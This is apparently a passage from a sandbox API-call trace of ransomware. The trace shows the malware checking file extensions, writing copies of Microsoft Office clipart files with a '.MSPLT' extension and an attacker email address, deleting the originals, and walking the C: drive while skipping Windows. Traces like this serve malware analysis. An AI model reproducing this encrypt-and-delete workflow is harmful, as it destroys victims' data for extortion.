Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.450] lstrlenW (lpString=".zip") returned 4 [0186.450] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.450] lstrlenW (lpString=".rar") returned 4 [0186.450] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.450] lstrlenW (lpString=".bz2") returned 4 [0186.450] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.450] lstrlenW (lpString=".7z") returned 3 [0186.450] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.450] lstrlenW (lpString=".dbf") returned 4 [0186.450] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.450] lstrlenW (lpString=".1cd") returned 4 [0186.450] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.450] lstrlenW (lpString=".jpg") returned 4 [0186.450] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.450] lstrlenW (lpString=".doc") returned 4 [0186.450] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.450] lstrlenW (lpString=".docx") returned 5 [0186.450] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.450] lstrlenW (lpString=".pdf") returned 4 [0186.450] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.450] lstrlenW (lpString=".xls") returned 4 [0186.450] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.450] lstrlenW (lpString=".xlsx") returned 5 [0186.451] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.451] lstrlenW (lpString=".ppt") returned 4 [0186.451] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.451] lstrlenW (lpString=".zip") returned 4 [0186.451] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.451] lstrlenW (lpString=".rar") returned 4 [0186.451] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.451] lstrlenW (lpString=".bz2") returned 4 [0186.451] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.451] lstrlenW (lpString=".7z") returned 3 [0186.451] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.451] lstrlenW (lpString=".dbf") returned 4 [0186.451] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.451] lstrlenW (lpString=".1cd") returned 4 [0186.451] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.451] lstrlenW (lpString=".jpg") returned 4 [0186.451] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.451] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.451] lstrlenW (lpString="AG00160_.GIF") returned 12 [0186.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0186.454] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=1146) returned 1 [0186.454] CloseHandle (hObject=0x390) returned 1 [0186.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 0x220 [0186.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0186.462] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.462] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0186.463] GetLastError () returned 0x0 [0186.463] ReadFile (in: hFile=0x390, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x47a, lpOverlapped=0x0) returned 1 [0186.512] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x480, lpOverlapped=0x0) returned 1 [0186.513] ReadFile (in: hFile=0x390, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0186.513] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0186.513] SetEndOfFile (hFile=0x36c) returned 1 [0186.513] CloseHandle (hObject=0x36c) returned 1 [0186.525] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.525] SetEndOfFile (hFile=0x390) returned 1 [0186.526] CloseHandle (hObject=0x390) returned 1 [0186.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.526] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0186.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.527] lstrlenW (lpString=".doc") returned 4 [0186.527] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.527] lstrlenW (lpString=".docx") returned 5 [0186.527] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.527] lstrlenW (lpString=".pdf") returned 4 [0186.527] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.527] lstrlenW (lpString=".xls") returned 4 [0186.527] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.527] lstrlenW (lpString=".xlsx") returned 5 [0186.527] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.527] lstrlenW (lpString=".ppt") returned 4 [0186.527] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.527] lstrlenW (lpString=".zip") returned 4 [0186.527] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.527] lstrlenW (lpString=".rar") returned 4 [0186.527] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.527] lstrlenW (lpString=".bz2") returned 4 [0186.527] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.527] lstrlenW (lpString=".7z") returned 3 [0186.528] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.528] lstrlenW (lpString=".dbf") returned 4 [0186.528] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.528] lstrlenW (lpString=".1cd") returned 4 [0186.528] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.528] lstrlenW (lpString=".jpg") returned 4 [0186.528] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.528] lstrlenW (lpString=".doc") returned 4 [0186.528] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.528] lstrlenW (lpString=".docx") returned 5 [0186.528] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.528] lstrlenW (lpString=".pdf") returned 4 [0186.528] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.528] lstrlenW (lpString=".xls") returned 4 [0186.528] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.528] lstrlenW (lpString=".xlsx") returned 5 [0186.528] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.528] lstrlenW (lpString=".ppt") returned 4 [0186.528] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.528] lstrlenW (lpString=".zip") returned 4 [0186.528] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.529] lstrlenW (lpString=".rar") returned 4 [0186.529] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.529] lstrlenW (lpString=".bz2") returned 4 [0186.529] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.529] lstrlenW (lpString=".7z") returned 3 [0186.529] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.529] lstrlenW (lpString=".dbf") returned 4 [0186.529] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.529] lstrlenW (lpString=".1cd") returned 4 [0186.529] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0186.529] lstrlenW (lpString=".jpg") returned 4 [0186.529] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.529] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.529] lstrlenW (lpString="AG00165_.GIF") returned 12 [0186.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0186.532] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=8582) returned 1 [0186.532] CloseHandle (hObject=0x390) returned 1 [0186.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 0x220 [0186.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0186.532] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.532] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0186.533] GetLastError () returned 0x0 [0186.533] ReadFile (in: hFile=0x390, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x2186, lpOverlapped=0x0) returned 1 [0187.195] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x2190, lpOverlapped=0x0) returned 1 [0187.197] ReadFile (in: hFile=0x390, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0187.197] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0187.197] SetEndOfFile (hFile=0x36c) returned 1 [0187.198] CloseHandle (hObject=0x36c) returned 1 [0187.200] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0187.200] SetEndOfFile (hFile=0x390) returned 1 [0187.202] CloseHandle (hObject=0x390) returned 1 [0187.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0187.202] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0187.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.203] lstrlenW (lpString=".doc") returned 4 [0187.203] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0187.203] lstrlenW (lpString=".docx") returned 5 [0187.203] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0187.203] lstrlenW (lpString=".pdf") returned 4 [0187.203] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0187.203] lstrlenW (lpString=".xls") returned 4 [0187.203] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0187.203] lstrlenW (lpString=".xlsx") returned 5 [0187.203] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0187.203] lstrlenW (lpString=".ppt") returned 4 [0187.203] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0187.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.203] lstrlenW (lpString=".zip") returned 4 [0187.204] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0187.204] lstrlenW (lpString=".rar") returned 4 [0187.204] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0187.204] lstrlenW (lpString=".bz2") returned 4 [0187.204] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0187.204] lstrlenW (lpString=".7z") returned 3 [0187.204] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0187.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.204] lstrlenW (lpString=".dbf") returned 4 [0187.204] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0187.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.204] lstrlenW (lpString=".1cd") returned 4 [0187.204] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0187.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.204] lstrlenW (lpString=".jpg") returned 4 [0187.204] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0187.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.204] lstrlenW (lpString=".doc") returned 4 [0187.204] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0187.204] lstrlenW (lpString=".docx") returned 5 [0187.204] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0187.204] lstrlenW (lpString=".pdf") returned 4 [0187.204] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0187.204] lstrlenW (lpString=".xls") returned 4 [0187.204] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0187.205] lstrlenW (lpString=".xlsx") returned 5 [0187.205] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0187.205] lstrlenW (lpString=".ppt") returned 4 [0187.205] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0187.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.205] lstrlenW (lpString=".zip") returned 4 [0187.205] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0187.205] lstrlenW (lpString=".rar") returned 4 [0187.205] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0187.205] lstrlenW (lpString=".bz2") returned 4 [0187.205] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0187.205] lstrlenW (lpString=".7z") returned 3 [0187.205] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0187.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.205] lstrlenW (lpString=".dbf") returned 4 [0187.205] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0187.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.206] lstrlenW (lpString=".1cd") returned 4 [0187.206] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0187.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0187.206] lstrlenW (lpString=".jpg") returned 4 [0187.206] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0187.206] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0187.206] lstrlenW (lpString="AG00175_.GIF") returned 12 [0187.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 12 os_tid = 0x136c [0164.824] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x31e0048 [0164.825] lstrlenW (lpString="C:") returned 2 [0164.825] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2d6fcf8 | out: lpFindFileData=0x2d6fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x729758 [0164.825] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0164.825] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0164.825] lstrlenW (lpString="$GetCurrent") returned 11 [0164.825] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0164.825] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x31f0050 [0164.826] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0164.826] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x729318 [0164.840] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0164.841] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0164.841] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0164.841] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0164.841] lstrlenW (lpString="Logs") returned 4 [0164.841] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0164.841] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0164.842] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0164.842] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x729458 [0164.845] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.845] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 